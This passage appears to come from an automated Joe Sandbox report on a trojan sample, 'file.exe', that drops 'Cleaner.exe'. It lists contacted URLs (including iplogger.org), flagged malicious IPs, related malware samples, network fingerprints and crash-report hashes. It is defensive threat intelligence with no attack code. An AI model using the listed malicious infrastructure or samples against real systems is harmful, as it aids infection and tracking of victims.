http://www.jiyu-kobo.co.jp/jp/	Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://iplogger.org	Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.orgx	Cleaner.exe, 0000001E.00000002.635650155.0000022E0040E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kralRegular	Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/F.	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netTTF.	Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://iplogger.org	Cleaner.exe, 0000001E.00000002.635678816.0000022E00418000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/x	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	Cleaner.exe, 0000001E.00000003.366066171.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn8	Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g-cleanit.hk	file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netF.	Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cno.	Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlll.	Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/	Cleaner.exe, 0000001E.00000003.364266164.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
148.251.234.83	iplogger.org	Germany		24940	HETZNER-ASDE	false
208.67.104.97	unknown	United States		20042	GRAYSON-COLLIN-COMMUNICATIONSUS	true
85.31.46.167	unknown	Germany		43659	CLOUDCOMPUTINGDE	true
107.182.129.235	unknown	Reserved		11070	META-ASUS	false
171.22.30.106	unknown	Germany		33657	CMCSUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715158
Start date and time:	2022-10-03 17:41:00 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.winEXE@21/51@1/5
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 91% Number of executed functions: 78 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Execution Graph export aborted for target Cleaner.exe, PID 4628 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
148.251.234.83	fea.exe	Get hash	malicious	Browse	iplogger.org/1WSpq7
	e4.exe	Get hash	malicious	Browse	iplogger.org/1fEwd7
	rFRgieWgV9.exe	Get hash	malicious	Browse	iplogger.org/1I0jB.torrent
	wKipJe57sn.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	03INSdtIoI.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	77284b3cbc32cafcd4aa5d222d0a0ecb92d72d465f8b2.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	B9BA3633E6AE613C553BB7311AFFB973B5D3C5F41DE5A.exe	Get hash	malicious	Browse	iplogger.org/1YKyj7
	0153AD4D1224B9A37B2EB3264EA7F8685828AB18C9C49.exe	Get hash	malicious	Browse	iplogger.org/1YZyj7
	585be0c57969f505e1ce900d1c0a7c10fc9f69a0e2e36.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	Fza7TPh6Z7.exe	Get hash	malicious	Browse	iplogger.org/1fEwd7
	u7Ib2JQQZL.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	1XdtZLPD3f.exe	Get hash	malicious	Browse	iplogger.org/1szwr7
	6Mt29QRW0p.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	ANOTHER.exe	Get hash	malicious	Browse	iplogger.org/1asSq7
	HKoLuz7ekJ.exe	Get hash	malicious	Browse	iplogger.org/1dnc57
	yLuLadKu7U.exe	Get hash	malicious	Browse	iplogger.org/1dnc57
	4618FB57958C19496E668916D769CB40E6BB0A0AF0FBB.exe	Get hash	malicious	Browse	iplogger.org/1kB597
	045A93EE4AA61FD3BB2C7F706085A249B9664876B7A2E.exe	Get hash	malicious	Browse	iplogger.org/1kB597
	i864x__setup__62257ec67f6ca.exe	Get hash	malicious	Browse	iplogger.org/1jiiu7
	WBIy6QzxFS.exe	Get hash	malicious	Browse	iplogger.org/1m2gj7.gz

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
iplogger.org	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GRAYSON-COLLIN-COMMUNICATIONSUS	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	PO20221003.doc	Get hash	malicious	Browse	208.67.105.179
	QUOTATION-323489.doc	Get hash	malicious	Browse	208.67.105.179
	bank in slip.doc	Get hash	malicious	Browse	208.67.105.179
	RFQ___876444334387 PO__.doc	Get hash	malicious	Browse	208.67.105.179
	file.exe	Get hash	malicious	Browse	208.67.104.97
	ADVANCE PAYMENT.doc	Get hash	malicious	Browse	208.67.105.179
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
	file.exe	Get hash	malicious	Browse	208.67.104.97
HETZNER-ASDE	https://89743677348987793490832904.xyz	Get hash	malicious	Browse	5.161.130.207
	file.exe	Get hash	malicious	Browse	148.251.234.83
	http://89743677348987793490832904.xyz	Get hash	malicious	Browse	5.161.130.207
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	Redriverbank-565463565463-565463.html	Get hash	malicious	Browse	135.181.125.9
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	IMG-ZIRAATI03102022.exe	Get hash	malicious	Browse	144.76.120.25
	file.exe	Get hash	malicious	Browse	148.251.234.83
	http://857393058784358684939586839.com	Get hash	malicious	Browse	5.161.130.207
	file.exe	Get hash	malicious	Browse	148.251.234.83
	http://857393058784358684939586839.com	Get hash	malicious	Browse	5.161.130.207
	1F5u1OLUIL.exe	Get hash	malicious	Browse	144.76.136.153
	http://89743677348987793490832904.xyz	Get hash	malicious	Browse	5.161.130.207
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	VkDJ.exe	Get hash	malicious	Browse	49.12.160.144

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	inquiry.pdf.exe	Get hash	malicious	Browse	148.251.234.83
	Xezmjebyq.exe	Get hash	malicious	Browse	148.251.234.83
	SecuriteInfo.com.Trojan.DownLoaderNET.476.27917.25504.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	cmGC87EqFi.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	URGENT REQUIREMENT.exe	Get hash	malicious	Browse	148.251.234.83
	IMG-ZIRAATI03102022.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	PO-13466.vbs	Get hash	malicious	Browse	148.251.234.83
	Inquiry list.exe	Get hash	malicious	Browse	148.251.234.83
	PO ZY-ZXM-2022092901.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	148.251.234.83

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_054230ad\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9188960827612409
Encrypted:	false
SSDEEP:	192:/Saa1VfavljH56rL03jDyc/u7sOS274It1hBx:/c2556rgjD/u7sOX4ItN
MD5:	FCCF03A72A3D70F2206DDC19C6DFA1C5
SHA1:	DD27941EF691A6FD3EBD81B2CC1EE6A6B28068E9
SHA-256:	3FBED246A18DD92B2D4CCE8CAA08381D022C71F24F2D9D5066A29A020C54A462
SHA-512:	F949BA205ACCA0508D301BAE31F4968C6652912DE2CA0043CD7FEB518B43E8D8830F9922C05B33F729AA58CCD82BD9D198B485AD9B6FBF56E4554E81FDD44045
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.5.8.5.2.5.7.9.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.5.5.c.1.8.7.-.2.4.4.c.-.4.0.8.d.-.9.d.3.b.-.9.7.e.5.d.4.c.9.b.9.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.c.7.c.a.3.f.-.3.5.8.1.-.4.f.5.8.-.8.b.5.d.-.3.8.3.d.8.8.4.2.6.8.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_06fdd724\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8847922385921617
Encrypted:	false
SSDEEP:	192:Ca1VfavNjH56rL03jDym/u7spS274It1hBx:F2x56rgjJ/u7spX4ItN
MD5:	045350D3F506D65A4AA750CD926CED5F
SHA1:	A2AFE64BB69714BD712DFD8FEE83B3B582D89A91
SHA-256:	0508015AE2B2B1CB3472C4459EF8BEC8099C719ADD1770185AB939AFDBAF136D
SHA-512:	8AE065C67A139D6DE61B98E4A0759F202FD7D0B3033F8C8DD84D9E9828693F4AB2911CB3B79458D84372C07C7341199A591D1F3B2A01C990F3A4C86EC0C3A992
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.3.5.4.6.1.3.2.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.2.f.9.f.9.f.-.d.d.8.0.-.4.c.c.4.-.a.7.7.5.-.b.9.d.b.9.2.2.9.e.8.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.2.6.c.9.f.7.-.2.0.d.5.-.4.d.5.7.-.9.2.5.a.-.6.1.9.1.4.e.4.0.9.0.5.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_0831a7e6\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.842266400581941
Encrypted:	false
SSDEEP:	192:O01a1VfavnjH56rL03jDB/u7spS274It1hBx:O0S2j56rgjl/u7spX4ItN
MD5:	85094D9C5EF6D2E7E289BC2608268853
SHA1:	C37EF11883705B25002E3532E9D0E40BD43A20FB
SHA-256:	99586DA1455970C5232C2380D240D02580E26BE557797265E83E479269AC6D83
SHA-512:	6EF9497ADDF4BB74696CB58809D54280364ECBC639BC2B663E5DAB6EF9521636A3C2A44A027C139AB5A6759435E3FA4D5A1EFFFC82ECF1D0A31E49FE3570ADDC
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.2.3.8.2.1.9.8.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.5.3.3.6.7.5.-.c.7.0.1.-.4.e.9.6.-.9.f.6.3.-.d.8.9.7.6.1.8.d.0.5.4.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.c.0.5.4.b.1.-.2.c.f.6.-.4.9.9.9.-.8.a.c.f.-.5.f.7.9.6.a.c.d.e.0.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_0ba59066\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8423223365804364
Encrypted:	false
SSDEEP:	192:oTxUESa1Vfav0jH56rL03jDB/u7spS274It1hBx:sD2a56rgjl/u7spX4ItN
MD5:	D40F054883F5574001B5F974FD4E22D7
SHA1:	17E872F0A393855EE3737405B8BDE67F3216D190
SHA-256:	D3C2CCE0F9C9A3E565C7104FD74566A5AF2A0FCBF55E2DD3158CEC0F5DDD9AC3
SHA-512:	64C57F2BB69467DB2AAEEE9A2750B5963AA544A87304418677B2C900517AFD37DD4E65E506365C8EC47F435AE543A59FAFADDBD8231FE8A84B13FADD046EC8D8
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.1.7.7.4.0.9.2.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.5.6.2.f.8.2.-.4.d.e.7.-.4.d.3.7.-.b.c.2.2.-.b.e.1.5.d.d.1.f.5.9.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.b.5.4.7.1.-.6.1.a.a.-.4.b.5.5.-.a.f.2.1.-.8.d.9.1.9.b.8.4.a.a.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_10519f99\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8422240262457396
Encrypted:	false
SSDEEP:	192:ZTa1VfavSjH56rL03jDB/u7spS274It1hBx:62Q56rgjl/u7spX4ItN
MD5:	B99DFC1DCEBB789F1DD111A73611D636
SHA1:	906F132099103DC458CC3188A90BB5C063EEA226
SHA-256:	D360715792237D1095C680060AAD37BC256C4FEAC2ABFA67A5BAA462515B0A0B
SHA-512:	F7726E5B68F40FD47FFBFFA8123E5C5BF1BB3012189100BCE904868587AF861178DB14E4EE922638FC1EA545566A187F38EE9DE59E04E712E3162037D86EE4F4
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.2.1.5.6.6.6.3.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.6.c.1.e.d.c.-.7.7.0.4.-.4.f.7.7.-.b.9.5.6.-.3.4.b.7.4.0.2.8.d.4.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.b.9.c.4.f.e.-.7.5.2.c.-.4.7.0.e.-.8.a.2.0.-.3.f.5.1.4.c.3.6.7.0.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

